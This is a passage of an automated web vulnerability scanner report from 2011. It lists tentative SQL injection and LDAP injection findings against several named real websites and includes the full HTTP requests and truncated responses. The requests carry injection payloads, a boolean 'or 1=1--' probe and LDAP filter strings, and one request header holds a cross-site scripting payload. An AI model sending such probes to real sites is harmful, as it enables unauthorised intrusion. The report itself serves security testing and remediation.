<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.37. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/uploaded-images/801818/40x37_thumb.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 98525213%20or%201%3d1--%20 and 98525213%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:28:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /uploaded-images/80181898525213%20or%201%3d2--%20/40x37_thumb.jpg HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:28:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.38. http://www.networkadvertising.org/managing/opt_out.asp [__utmz cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.networkadvertising.org
Path:	/managing/opt_out.asp

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /managing/opt_out.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:43:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:43:52 GMT
Cache-control: no-cache

<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=0.5000116'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.417152'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.1968892'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.5920985'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.4064707'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.open
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:43:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:43:54 GMT
Cache-control: no-cache

<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=7.551211E-02'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.9926525'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.7723897'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.167599'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.9819712'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.o
...[SNIP]...

1.39. http://www.networkadvertising.org/managing/opt_out.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.networkadvertising.org
Path:	/managing/opt_out.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 30670060'%20or%201%3d1--%20 and 30670060'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /managing/opt_out.asp?130670060'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:44:06 GMT
Cache-control: no-cache

<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=0.5953485'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.512489'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.2922261'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.6874354'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.5018076'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.ope
...[SNIP]...

Request 2

GET /managing/opt_out.asp?130670060'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:44:06 GMT
Cache-control: no-cache

<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=0.7764398'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.6935803'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.4733174'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.8685267'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.6828989'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.op
...[SNIP]...

1.40. http://y.timesunion.com/b/ss/hearstalbanytu/1/H.21/s97295546184759 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://y.timesunion.com
Path:	/b/ss/hearstalbanytu/1/H.21/s97295546184759

Issue detail

Remediation detail

Request 1

GET /b%2527/ss/hearstalbanytu/1/H.21/s97295546184759?AQB=1&ndh=1&t=17/8/2011%2016%3A24%3A32%206%20300&vmt=4C9145CE&vmf=hearst.112.2o7.net&ns=hearst&pageName=HomePage&g=http%3A//www.timesunion.com/&r=http%3A//hearst.com/newspapers/albany-times-union.php&cc=USD&ch=home&server=timesunion.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A00PM&v17=5%3A00PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c22=Home&v22=Home&c23=4654&v23=4654&c24=home%20page&v24=home%20page&c28=http%3A//www.timesunion.com/&v29=http%3A//www.timesunion.com/&c42=http%3A//www.timesunion.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: y.timesunion.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1316294672447-New%7C1318886672447%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:36:58 GMT
Server: Omniture DC/2.0.0
Content-Length: 439
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/hearstalbanytu/1/H.21/s97295546184759 was no
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/hearstalbanytu/1/H.21/s97295546184759?AQB=1&ndh=1&t=17/8/2011%2016%3A24%3A32%206%20300&vmt=4C9145CE&vmf=hearst.112.2o7.net&ns=hearst&pageName=HomePage&g=http%3A//www.timesunion.com/&r=http%3A//hearst.com/newspapers/albany-times-union.php&cc=USD&ch=home&server=timesunion.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A00PM&v17=5%3A00PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c22=Home&v22=Home&c23=4654&v23=4654&c24=home%20page&v24=home%20page&c28=http%3A//www.timesunion.com/&v29=http%3A//www.timesunion.com/&c42=http%3A//www.timesunion.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: y.timesunion.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1316294672447-New%7C1318886672447%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:36:58 GMT
Server: Omniture DC/2.0.0
xserver: www498
Content-Length: 0
Content-Type: text/html

2. LDAP injection previous next
There are 3 instances of this issue:

http://ce.lijit.com/merge [REST URL parameter 1]
http://pixel.quantserve.com/optout_set [nocache parameter]
http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter]

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

2.1. http://ce.lijit.com/merge [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ce.lijit.com
Path:	/merge

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*?pid=2&3pid=439524AE9E11374EB2C0C71740C604 HTTP/1.1
Host: ce.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: ljtrtb=eJyrVjJUslKyNDA2NjExMjYysDQ0M7AwNzM2UaoFAE9xBcY%3D; ljt_reader=1860442d61f8e1f2d8924f58549ca25b; _OACAP[4578]=1; _OABLOCK[4578]=1314593701; _OACCAP[593]=1; _OACBLOCK[593]=1314593701

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:09:13 GMT
Server: PWS/1.7.3.3
X-Px: ms h0-s1023.p10-sjc ( h0-s1004.p10-sjc), ms h0-s1004.p10-sjc ( origin>CONN)
Cache-Control: max-age=30
Expires: Sat, 17 Sep 2011 17:09:43 GMT
Age: 0
Content-Length: 284
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /*)(sn=* was not found on this server.</p>
<hr>
<address>Apache/2.2.14 (Ubuntu) Server at vap.lijit.com Port 80</address>
</body></html>

Request 2

GET /*)!(sn=*?pid=2&3pid=439524AE9E11374EB2C0C71740C604 HTTP/1.1
Host: ce.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: ljtrtb=eJyrVjJUslKyNDA2NjExMjYysDQ0M7AwNzM2UaoFAE9xBcY%3D; ljt_reader=1860442d61f8e1f2d8924f58549ca25b; _OACAP[4578]=1; _OABLOCK[4578]=1314593701; _OACCAP[593]=1; _OACBLOCK[593]=1314593701

Response 2

